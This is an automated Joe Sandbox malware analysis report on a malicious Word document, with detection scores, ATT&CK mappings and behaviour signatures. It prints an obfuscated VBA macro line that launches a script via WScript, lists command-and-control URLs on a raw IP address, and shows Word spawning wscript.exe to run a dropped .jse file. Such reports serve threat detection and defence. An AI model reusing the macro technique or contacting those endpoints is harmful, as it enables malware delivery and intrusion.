Play interactive tour

Edit tour

Analysis Report 1072749549_VIRUS0045310798.doc

Overview

General Information

Joe Sandbox Version:	28.0.0
Analysis ID:	1048558
Start date:	24.01.2020
Start time:	22:59:03
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 8m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	1072749549_VIRUS0045310798.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit (version 1803) with Office 2016 Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) GSI enabled (Javascript) GSI enabled (Java) AMSI enabled
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.expl.evad.winDOC@5/15@0/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Changed system and user locale, location and keyboard layout to English - United States Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, HxTsr.exe, WMIADAP.exe, conhost.exe, CompatTelRunner.exe Excluded IPs from analysis (whitelisted): 51.105.249.223, 13.107.3.128, 52.109.88.8, 52.109.88.35, 52.114.32.24, 51.105.249.239 Excluded domains from analysis (whitelisted): client.wns.windows.com, am3p.wns.notify.windows.com.akadns.net, prod.configsvc1.live.com.akadns.net, s-0001.s-msedge.net, mobile.pipe.aria.microsoft.com, wns.notify.windows.com.akadns.net, prod.nexusrules.live.com.akadns.net, prd.col.aria.mobile.skypedata.akadns.net, pipe.skype.com, emea1.notify.windows.com.akadns.net, config.officeapps.live.com, officeclient.microsoft.com, pipe.prd.skypedata.akadns.net, config.edge.skype.com, nexusrules.officeapps.live.com, europe.configsvc1.live.com.akadns.net, pipe.cloudapp.aria.akadns.net Execution Graph export aborted for target wscript.exe, PID 6000 because there are no executed function Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Detection

Strategy	Score	Range	Reporting	Whitelisted	Detection
Threshold	72	0 - 100	Report FP / FN	false

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Winlogon Helper DLL	Process Injection12	Masquerading1	Credential Dumping	Process Discovery1	Application Deployment Software	Data from Local System	Data Compressed	Data Obfuscation	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Replication Through Removable Media	Scripting22	Port Monitors	Accessibility Features	Process Injection12	Network Sniffing	Application Window Discovery1	Remote Services	Data from Removable Media	Exfiltration Over Other Network Medium	Fallback Channels	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
External Remote Services	Graphical User Interface1	Accessibility Features	Path Interception	Scripting22	Input Capture	Security Software Discovery1	Windows Remote Management	Data from Network Shared Drive	Automated Exfiltration	Custom Cryptographic Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Drive-by Compromise	Exploitation for Client Execution11	System Firmware	DLL Search Order Hijacking	Obfuscated Files or Information1	Credentials in Files	File and Directory Discovery1	Logon Scripts	Input Capture	Data Encrypted	Multiband Communication	SIM Card Swap		Premium SMS Toll Fraud
Exploit Public-Facing Application	Command-Line Interface	Shortcut Modification	File System Permissions Weakness	Masquerading	Account Manipulation	System Information Discovery4	Shared Webroot	Data Staged	Scheduled Transfer	Standard Cryptographic Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Signature Overview

Click to jump to signature section

AV Detection:

Machine Learning detection for sample

Show sources

Source: 1072749549_VIRUS0045310798.doc

Joe Sandbox ML: detected

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Process created: C:\Windows\SysWOW64\wscript.exe

Jump to behavior

Potential document exploit detected (unknown TCP traffic)

Show sources

Source: global traffic

TCP traffic: 192.168.1.103:49719 -> 185.216.35.24:80

Networking:

Connects to IPs without corresponding DNS lookups

Show sources

Source: unknown	TCP traffic detected without corresponding DNS query: 185.216.35.24
Source: unknown	TCP traffic detected without corresponding DNS query: 185.216.35.24
Source: unknown	TCP traffic detected without corresponding DNS query: 185.216.35.24

Urls found in memory or binary data

Show sources

Source: wscript.exe, 00000006.00000002.665229925.0000000002E38000.00000004.00000020.sdmp	String found in binary or memory: http://185.216.35.24/
Source: wscript.exe, 00000006.00000002.665356332.0000000002E82000.00000004.00000020.sdmp	String found in binary or memory: http://185.216.35.24/V
Source: wscript.exe, 00000006.00000002.667790424.0000000005DE3000.00000004.00000040.sdmp	String found in binary or memory: http://185.216.35.24/atB3n2/M8lvg.php?zs=ss&ed=54962047&tf=14126220
Source: wscript.exe, 00000006.00000002.665229925.0000000002E38000.00000004.00000020.sdmp	String found in binary or memory: http://185.216.35.24/atB3n2/M8lvg.php?zs=ss&ed=54962047&tf=15312748
Source: wscript.exe, 00000006.00000002.665356332.0000000002E82000.00000004.00000020.sdmp	String found in binary or memory: http://185.216.35.24/atB3n2/M8lvg.php?zs=ss&ed=54962047&tf=15312748%
Source: wscript.exe, 00000006.00000002.665229925.0000000002E38000.00000004.00000020.sdmp	String found in binary or memory: http://185.216.35.24/atB3n2/M8lvg.php?zs=ss&ed=54962047&tf=15312748SJ
Source: wscript.exe, 00000006.00000002.665356332.0000000002E82000.00000004.00000020.sdmp	String found in binary or memory: http://185.216.35.24/atB3n2/M8lvg.php?zs=ss&ed=54962047&tf=15312748m
Source: wscript.exe, 00000006.00000002.667005047.00000000052CB000.00000004.00000001.sdmp	String found in binary or memory: http://185.216.3?
Source: wscript.exe, 00000006.00000002.665356332.0000000002E82000.00000004.00000020.sdmp	String found in binary or memory: http://185.216.3WLf
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://api.onedrive.com
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://augloop.office.com
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://cdn.entity.
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/documentvirality/prod/index.html
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/progressui/index.html
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://cr.office.com
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://directory.services.
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://graph.windows.net
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://graph.windows.net/
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: wscript.exe, 00000006.00000002.665356332.0000000002E82000.00000004.00000020.sdmp	String found in binary or memory: https://login.live.comy0
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://login.windows.local
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://management.azure.com
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://management.azure.com/
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://messaging.office.com/
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://ncus-000.contentsync.
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://ncus-000.pagecontentsync.
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://officeapps.live.com
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://onedrive.live.com
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://settings.outlook.com
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://tasks.office.com
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://wus2-000.contentsync.
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://wus2-000.pagecontentsync.
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: BE32BEBA-DB68-44CB-BE87-43579C80C0C5.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

System Summary:

Document contains OLE streams with a MsTscAx control

Show sources

Source: 1072749549_VIRUS0045310798.doc	Stream path 'ObjectPool/_1641106895/\x1CompObj' : MsTscAx control found
Source: 1072749549_VIRUS0045310798.doc	Stream path 'WordDocument' : MsTscAx control found

Document contains an embedded VBA macro with suspicious strings

Show sources

Source: 1072749549_VIRUS0045310798.doc	OLE, VBA macro line: CallByName Dceas(bandera, Ki7gg & "ript." & Nberft), Ubedf7, VbMethod, """" & Bedcoll & """" & " " & "--" & bandera, 1
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MostrarMensaje, String callbyname: CallByName Dceas(bandera, Ki7gg & "ript." & Nberft), Ubedf7, VbMethod, """" & Bedcoll & """" & " " & "--" & bandera, 1			Name: MostrarMensaje

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Show sources

Source: 1072749549_VIRUS0045310798.doc

Stream path 'Macros/VBA/ThisDocument' : found possibly 'ADODB.Stream' functions open, read, write

Abnormal high CPU Usage

Show sources

Source: C:\Windows\SysWOW64\wscript.exe

Process Stats: CPU usage > 98%

Document contains embedded VBA macros

Show sources

Source: 1072749549_VIRUS0045310798.doc

OLE indicator, VBA macros: true

Classification label

Show sources

Source: classification engine

Classification label: mal72.expl.evad.winDOC@5/15@0/1

Creates files inside the user directory

Show sources

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\BE32BEBA-DB68-44CB-BE87-43579C80C0C5

Jump to behavior

Creates temporary files

Show sources

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user~1\AppData\Local\Temp\{6F7FB421-51ED-4907-A98D-AC50BFE11A79} - OProcSessId.dat

Jump to behavior

Document contains an OLE Word Document stream indicating a Microsoft Word file

Show sources

Source: 1072749549_VIRUS0045310798.doc

OLE indicator, Word Document stream: true

Document contains summary information with irregular field values

Show sources

Source: 1072749549_VIRUS0045310798.doc

OLE document summary: title field not present or empty

Queries process information (via WMI, Win32_Process)

Show sources

Source: C:\Windows\SysWOW64\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process

Reads ini files

Show sources

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Windows\SysWOW64\wscript.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe 'C:\Users\user\AppData\Roaming\Microsoft\Word\fuc.jse' --10
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe 'C:\Users\user\AppData\Roaming\Microsoft\Word\fuc.jse' --10	Jump to behavior

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f414c262-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
